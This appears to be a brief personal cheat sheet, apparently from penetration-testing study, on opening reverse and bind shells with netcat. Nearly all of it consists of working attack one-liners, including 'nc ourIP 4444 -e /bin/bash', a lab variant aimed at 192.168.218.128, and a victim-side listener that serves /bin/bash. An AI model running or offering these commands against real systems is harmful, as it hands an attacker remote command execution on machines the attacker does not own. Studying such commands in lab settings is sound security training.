Search

Shells (NetCat)

Reverse shell (95% of the time):

Victim connecting to us.

We start listening on port 4444:

nc -nvlp 4444

Victim connects:

nc ourIP 4444 -e /bin/bash

LAB:
nc 192.168.218.128 4444 -e /bin/bash

Note: command.exe if windows. Bash because Linux

Bind shell:

Us connecting to victim

Victim starts listening:

nc -nvlp 4444 -e /bin/bash

Note: victim always opens bash

Us connecting:

NC victimIP 4444